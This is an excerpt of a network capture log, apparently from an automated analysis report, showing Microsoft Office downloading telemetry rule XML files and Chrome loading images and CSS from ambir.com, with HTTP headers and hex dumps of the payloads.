                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 87 5d 52 9f b2 0d c5 e8 be 91 9b a1 9f f7 a0 bc d8 cc c6 62 71 3f 1a 75 ea f5 63 30 71 42 1e f3 08 85 56 1c 6e 7c 14 75 60 8a ae 76 4d 7d f9 2f 3c 5b 7e 66 1e c9 24 92 ff 10 77 24 3a f2 4c 7e d3 63 7e 0e eb 85 fd c9 35 fd 27 4c 95 8d 0e 6c db 67 44 cb 65 cf 38 c1 2d a1 1b f0 e7 f6 1c af b7 c5 de 7f 66 65 cd 79 69 8b 90 9a 74 e7 92 a1 c5 14 ea 19 ed 75 36 42 af be 7a b3 74 61 7f 4c 4b 05 7f 87 3d 5e 48 6d fa 60 2d 26 fd f1 e8 5f 92 2a bc 3f ac 0c 3f 18 11 25 70 78 bc 19 99 a2 3e 7f 58 79 49 57 5f 6e ff d9 3e 7f 54 1d fe 44 79 f1 b0 ba f4 23 e5 b5 bc f2 d2 11 a5 fd b1 fa c2 31 e5 a5 93 ea da 61 75 55 2f 09 c1 25 e3 0d 2b 9b b9 bb 77 09 31 2a d9 75 38 fa 8b 0a 89 36 c9 24 8b 42 85 aa 81 71 ce 63 22 25 36 34 90 5e 8c fa 55 e9 0f dc 77 1e 0a 7a 1c a1 24 5c af
                                                                                                                                                                                              Data Ascii: ]Rbq?uc0qBVn|u`vM}/<[~f$w$:L~c~5'LlgDe8-feyitu6BztaLK=^Hm`-&_*??%px>XyIW_n>TDy#1auU/%+w1*u86$Bqc"%64^Uwz$\
                                                                                                                                                                                              2024-11-20 20:28:19 UTC1369INData Raw: 88 50 d1 03 ec 34 5f b1 ca b5 42 6b ac 02 27 d7 43 10 ad 18 db 0e 89 6d 71 7f 2d 4c 17 af 00 41 f7 6c 90 52 83 60 f6 6c 3e b4 ee 1a ed a0 f3 03 dc 1e 58 62 38 e3 f6 21 26 c7 78 9d 60 ca 6c 10 ed e9 96 1f 08 44 14 b6 fe 37 5c 81 01 d1 3b 58 1b 01 82 a0 79 71 d0 b4 4e 8e 1d bd 0e b4 04 ef a8 97 61 89 aa 8b 72 da 58 32 37 e4 c3 b7 60 fb 23 91 49 a4 5f 7a 95 ce f9 10 03 1a 95 13 e6 fe ec d5 76 02 f6 93 4c 71 8f fe 4d 99 3c c6 5b 06 df fa c4 d5 11 e3 e4 91 4a ea e9 1f b3 04 77 1e d0 e9 57 cc e3 6f 31 1f 00 7a 3e 7c 77 fb 3d 44 02 dd c4 a8 de e8 9f 7b 65 8b c2 7e f6 fe 7b 3b 51 49 6b 59 ad 29 e9 f5 35 85 a3 d4 cb cf e5 ad ed 79 4e 10 74 e9 4e 43 15 df 6a 9e 8b f2 ca 52 51 e1 df 8f da 3e da b7 58 41 e9 da 1e c7 8d 0a bf 3b a7 55 54 9c 3f 62 58 b6 48 02 1a 19 18
                                                                                                                                                                                              Data Ascii: P4_Bk'Cmq-LAlR`l>Xb8!&x`lD7\;XyqNarX27`#I_zvLqM<[JwWo1z>|w=D{e~{;QIkY)5yNtNCjRQ>XA;UT?bXH


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              18192.168.2.54973413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2160
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA3B95D81"
                                                                                                                                                                                              x-ms-request-id: 8753231e-501e-008f-038c-3a9054000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202818Z-1777c6cb754mqztshC1TEB4mkc0000000a5g000000008zaz
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:18 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              19192.168.2.54973213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 3788
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                              ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                              x-ms-request-id: 1c744767-001e-0082-6060-3b5880000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202818Z-178bfbc474bwh9gmhC1NYCy3rs00000000g000000000a5vm
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:18 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              20192.168.2.54973313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:19 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 450
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                                                                                                                                                              ETag: "0x8DC582BD4C869AE"
                                                                                                                                                                                              x-ms-request-id: 05856cf7-f01e-0020-4060-3b956b000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202818Z-185f5d8b95cjbkr4hC1NYCeu240000000akg00000000nws5
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:19 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              21192.168.2.54973513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-20 20:28:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 2980
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                              ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                              x-ms-request-id: 1aa7a34d-201e-0096-3676-3bace6000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241120T202818Z-178bfbc474bq2pr7hC1NYCkfgg00000000m000000000qdsa
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-20 20:28:19 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              22192.168.2.549737141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:18 UTC624OUTGET /wp-content/themes/ambir/images/search.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:19 UTC530INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:18 GMT
                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                              Content-Length: 164
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=363
                                                                                                                                                                                              Content-Disposition: inline; filename="search.webp"
                                                                                                                                                                                              ETag: "651c3a0e-16b"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13806
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f8a3d7443ac-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:19 UTC164INData Raw: 52 49 46 46 9c 00 00 00 57 45 42 50 56 50 38 4c 90 00 00 00 2f 13 c0 04 10 87 30 66 c3 1c 06 d9 46 8e fd 13 ac 6f f0 c1 0c 00 0f 10 07 80 c0 12 18 46 92 12 69 e1 40 0f df cd 3f 5d 9f 32 84 88 fe 4f 00 9e 5b 74 b2 26 b9 91 42 b6 5a 27 87 9f a4 b1 28 00 78 67 3a 14 66 ec a5 d1 36 c6 82 b3 ce be 09 ea 05 7e 7e 4b 6f b8 35 e6 85 f5 4a 9f d8 ae 8e 2b a7 2f 89 7e 53 a9 8b cc 2e 27 67 60 eb 6c ba 73 52 76 48 1c bf a9 79 25 19 07 58 e3 36 24 18 07 e0 cb 39 bb 02 08 c6 e9 36 18 0f 10 8c 07 08 26
                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8L/0fFoFi@?]2O[t&BZ'(xg:f6~~Ko5J+/~S.'g`lsRvHy%X6$96&


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              23192.168.2.549740141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC625OUTGET /wp-content/themes/ambir/images/cerrar2.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:19 UTC532INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:19 GMT
                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                              Content-Length: 356
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=1012
                                                                                                                                                                                              Content-Disposition: inline; filename="cerrar2.webp"
                                                                                                                                                                                              ETag: "651c3a0e-3f4"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13807
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f8feb9c42f2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:19 UTC356INData Raw: 52 49 46 46 5c 01 00 00 57 45 42 50 56 50 38 4c 4f 01 00 00 2f 2d 40 0b 10 60 d8 b6 6d 18 fe 7f f6 e0 b4 a9 f7 40 84 db d8 b6 55 e5 fc 5f 81 21 43 e4 d2 81 f7 00 b1 b7 e1 ee ee 90 7a 93 3f da 0c dc 36 52 54 90 e6 f6 f8 6e e0 0f 54 a7 a2 bf 72 05 0c 55 2f 99 0f 42 00 4c 1b 06 e0 f5 41 13 00 8c df 61 0f 80 f7 81 89 8a 6c 01 c0 99 88 48 d4 1d 00 0c de 60 05 00 4e ec 78 06 e1 08 f5 5e 60 0e 00 ae ac f1 14 a2 21 9d 3d 4c 01 c0 73 9a 48 e4 2d 34 89 87 8a bd 97 d0 78 b9 77 61 22 b1 78 16 93 0d 6c e2 81 b8 d7 a7 11 8f a7 31 ba 27 83 5d 3c 0e 87 a8 22 06 82 7c b4 a1 a4 27 00 18 2e f6 ba f2 13 ed e4 76 95 35 00 b8 08 d0 96 52 79 d3 4b e6 38 ef 4d 24 71 4e 0f b3 f3 de ed ce 90 f6 21 19 3c c2 8d d0 38 1e 20 5c 08 f5 4d a7 0b 3a f0 72 b5 a7 fb 8c b8 43 e9 84 20 d5 51
                                                                                                                                                                                              Data Ascii: RIFF\WEBPVP8LO/-@`m@U_!Cz?6RTnTrU/BLAalH`Nx^`!=LsH-4xwa"xl1']<"|'.v5RyK8M$qN!<8 \M:rC Q


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              24192.168.2.549742141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC625OUTGET /wp-content/themes/ambir/images/search2.png HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:19 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:19 GMT
                                                                                                                                                                                              Content-Type: image/webp
                                                                                                                                                                                              Content-Length: 172
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                              Cf-Polished: origFmt=png, origSize=392
                                                                                                                                                                                              Content-Disposition: inline; filename="search2.webp"
                                                                                                                                                                                              ETag: "651c3a0d-188"
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:05 GMT
                                                                                                                                                                                              Vary: Accept
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13807
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f8fefaf0f83-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:19 UTC172INData Raw: 52 49 46 46 a4 00 00 00 57 45 42 50 56 50 38 4c 97 00 00 00 2f 13 c0 04 10 87 30 ff f3 3f ff 06 d9 46 8e fd 13 ac 6f f0 81 39 00 c0 03 20 1c 00 20 c0 22 30 8c 24 b5 cd 83 92 51 fc fe db 05 69 5c 42 44 ff 27 00 00 b2 2d 72 54 c1 a3 74 72 8e 71 b8 cb 4d 26 bb 02 40 59 ac 97 ce 86 58 26 73 90 d9 71 d7 b3 02 a3 3e e0 63 72 6b e2 35 b3 39 8e 27 fd 25 47 63 3f 15 16 57 59 5e 06 d5 c9 59 72 2b 34 84 85 53 a3 42 4a 84 ca fd 65 cd 65 90 b4 0b f2 64 68 62 b4 0b 90 5a 6b 45 01 18 ed f6 6a b4 1f 60 b4 1f 60 ac 3f a0 2a 00
                                                                                                                                                                                              Data Ascii: RIFFWEBPVP8L/0?Fo9 "0$Qi\BD'-rTtrqM&@YX&sq>crk59'%Gc?WY^Yr+4SBJeedhbZkEj``?*


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              25192.168.2.549741141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:19 UTC617OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-footer-b7463f6d.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:20 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:19 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:19 GMT
                                                                                                                                                                                              ETag: W/"673e2a07-54d3"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 2515
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f8fff8a7cac-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
